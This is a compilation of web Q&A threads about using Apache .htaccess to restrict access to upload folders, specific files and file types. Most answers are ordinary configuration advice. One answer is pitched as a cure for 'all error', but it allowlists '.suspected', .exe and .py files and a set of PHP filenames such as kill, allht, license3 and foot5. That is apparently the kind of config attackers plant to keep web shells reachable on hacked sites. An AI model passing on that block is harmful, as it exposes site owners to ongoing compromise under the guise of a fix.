htaccess contact form upload folder - how to hide it - .htaccess

I have got a contact form on my website with file attachment as well, that has been restricted only to pictures. Although if I type in example.com/uploads/ all the files are accessible by anyone. Is htaccess the best way to hide it? Also how could I do that in a safe manner, without messing up the contact form?
I have tried this, but it blocks the whole website
deny from all
<Files ~ “^w+.(gif|jpe?g|png)$”>
order deny,allow
allow from all
</Files>

if I type in example.com/uploads/ all the files are accessible
You mean you get a directory listing? This can be disabled in .htaccess:
Options -Indexes
To actively block all HTTP requests for files in the /uploads directory (since you state in comments that these are only ever accessed over FTP) then all you need is (in your root .htaccess file):
RewriteEngine On
RewriteRule ^uploads - [F]
This will respond with a 403 Forbidden for all requests that start /uploads.

Just to block access to example.com/uploads/ you can place this rule in /uploads/.htaccess:
RewriteEngine On
RewriteRule ^/?$ - [F]

Related

deny access to all files accept the index.php and the domain name with .htaccess

My website name is: cabinets.ga
I want to deny the access to all of my folders and files in my website, so this is my code to do that:
Order deny,allow
Deny from all
<FilesMatch "index\.php">
Allow from all
</FilesMatch>
This code works fine if the user write the link with the index.php like that : cabinets.ga/index.php but if he write only the domain name without the index.php like that: cabinets.ga it will give him (Forbidden)
So i want that if he enter both the domain name with the index.php or without it the website display the index.php without Forbidden it.. Any help please?
You can actually just make the filename optional in the regex (you don't need to use mod_rewrite). For example:
Order deny,allow
Deny from all
<FilesMatch "^(index\.php)?$">
Allow from all
</FilesMatch>
This will allow direct requests to index.php and also requests for the directory (no filename) ...which results in index.php (the DirectoryIndex) being served by mod_dir via an internal subrequest (which occurs later).
Note that you can't simply permit an empty filename (ie. "^$"). Whilst this allows the initial request for the bare directory, it will result in the internal subrequest for the DirectoryIndex, ie. index.php being blocked - so ultimately the request is blocked.
Note also that this allows access to all index.php files in all subdirectories and all directories that contain an index.php index document.
However, if you are on Apache 2.4 then you should be using Require instead, since Order, Deny and Allow are all deprecated on Apache 2.4.
Require all denied
<FilesMatch "^(index\.php)?$">
Require all granted
</FilesMatch>
UPDATE: My website is a single page application has just an index.php page controls all of my website with jquery ajax request, so i want when the user writed any other links accept my domain name accept the domain name the htaccess will redirect the user to the domain name
It sounds like you need to implement a front-controller pattern. The simplest form is using the FallbackResource directive. For example:
FallbackResource /index.php
Any requests that would otherwise result in a 404 are routed to /index.php. Any static resources (CSS, JS, images etc.) remain accessible and are not routed to /index.php.

set htaccess for access to this file Directly

i want all of file in folder /client/ just available to access by subdomain.site.com
to another say i have Some swf(flash) file in folder /client/ For example /client/1.swf that if user enter this address in browser: site.com/client/1.swf
he can's access to this file Directly
but i want user just can accessible to site.com/client/1.swf address through subdomain.site.com
anybody can help me for set htaccess file !?
Try adding this to the htaccess file in your document root:
RewriteEngine On
RewriteCond %{HTTP_HOST} !^subdomain\.site\.com$ [NC]
RewriteRule ^client/ - [L,F]
If you would rather return a 404 instead of a 403 (forbidden) then change the stuff in the square brackets to: [L,R=404]
Another way is to Create an .htaccess file in client. Like /client/.htaccess Then put this code.
Apache 2.2
order deny,allow
deny from all
allow from 127.0.0.1
Apache 2.4
Require all denied
Require ip 127.0.0.1

Htaccess to use the hosting for live testing

I would use the hosting for live testing, but I want to protect access and prevent search engine indexing.
For example (server directory structure) within public_html:
_private
_bin
_cnf
_log
_ ... (more default directories hosting)
testpublic
css
images
index.html
I want index.html is visibile to everyone and all other directories (except "testpublic") are hidden, protected access and search engines not to index.
The directory "testpublic" I wish it was public but may not be indexed in search engines, not sure if this is possible.
To do understand that I need 2 files .htaccess.
One general in "public_html" and other specific for "testpublic".
The .htaccess general (public_html) I think it should be something like:
AuthUserFile /home/folder../.htpasswd
AuthName "test!"
AuthType Basic
require user admin123
< FilesMatch "index.html">
Satisfy Any
< / FilesMatch>
Can anyone help me create the files with the appropriate properties? Thank you!
You can use a robots.txt file in your root folder. All standards-abiding robots will obey this file and not index your files and folders.
Example Robots.txt that tells all (*) crawlers to move on and index nothing.
User-agent: *
Disallow: /
You could use .htaccess files to fine tune what your server (assuming Apache) serves out and what directory indexes are visible. In which case you would add
IndexIgnore *
To your .htaccess file to disallow indexes.
Updated (Credit to https://stackoverflow.com/users/1714715/samuel-cook):
If you want to specifically stop a bot/crawler and know its USER AGENT string you can do so in your .htaccess
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} Googlebot
RewriteRule ^.* - [F,L]
</IfModule>
Hope this helps.

htaccess allowing access files by extension?

I saw several htaccess example disabling some files to access:
<Files ~ "\.(js|sql)$">
order deny,allow
deny from all
</Files>
for example, this prevents to access all .JS and .SQL files, the others are enabled. I want the contrary! I want those files to be ENABLED, all others to be prevented. How to achieve this?
Vorapsak's answer is almost correct. It's actually
order allow,deny
<Files ~ "\.(js|sql)$">
allow from all
</Files>
You need the order directive at the top (and you don't need anything else).
The interesting thing is, it seems we can't just negate the regex in FilesMatch, which is... weird, especially since the "!" causes no server errors or anything. Well, duh.
and a bit of explanation:
The order cause tells the server about its expected default behaviour. The
order allow,deny
tells the server to process the "allow" directives first: if a request matches any allow directive, it's marked as okay. Then the "deny" directives are evaulated: if a request matches any deny directives, it's denied (it doesn't matter if it was allowed in the first pass). If no matches were found, the file is denied.
The directive
order deny,allow
works the opposite way: first the server processes the "deny" directives: if a request matches, it's marked to be denied. Then the "allow" directives are evaulated: if a request matches an allow directive, it's allowed in, even if it matches a deny directive earlier. If a request matches nothing, the file is allowed.
In this specific case, the server first tries to match the allow directives: it sees that js and sql files are allowed, so a request to foo.js goes through; a request to bar.php matches no directives, so it's denied.
If we swap the directive to "order deny,allow", then foo.js will go through (for being a js), and bar.php will also go through, as it matches no patterns.
oh and, one more thing: directives in a section (i.e. < Files> and < Directory>) are always evaulated after the main body of the .htaccess file, overwriting it. That's why Vorapsak's solution did not work as inteded: the main .htaccess denied the request, then the < Files> order was processed, and it allowed the request.
Htaccess is magic of the worst kind, but there's logic to it.
Did you try setting a
deny from all
outside (before) the tag, then changing the
deny from all
to
allow from all
inside? Something like
deny from all
<Files ~ "\.(js|sql)$">
order allow,deny
allow from all
</Files>
if you are having trouble with your website, use this htaccess code. It solves all error you may likely encounter
DirectoryIndex index.html index.php
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store).php$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
If this help you, don't forget to thump up!!!

Htaccess rewrite does not work

I was told that this is the right way to redirect anyone who is trying to open:
/users/username/something.txt
But i can't seem to get it work.
RewriteEngine on
RewriteRule \.txt$ /notallowed.html [F,L,NC]
Is this wrong?
The simplest way to deny users from all TXT files would be to use something like:
<FilesMatch "\.(txt)$">
Order Allow,Deny
Deny from all
</FilesMatch>
However, the code you have there should work for all intents and purposes. Depending on your server configuration, however, you may need to add "Options +FollowSymLinks".
If you decide to go the FilesMatch route, you can use ErrorDocument to control what page the user is taken to.

Resources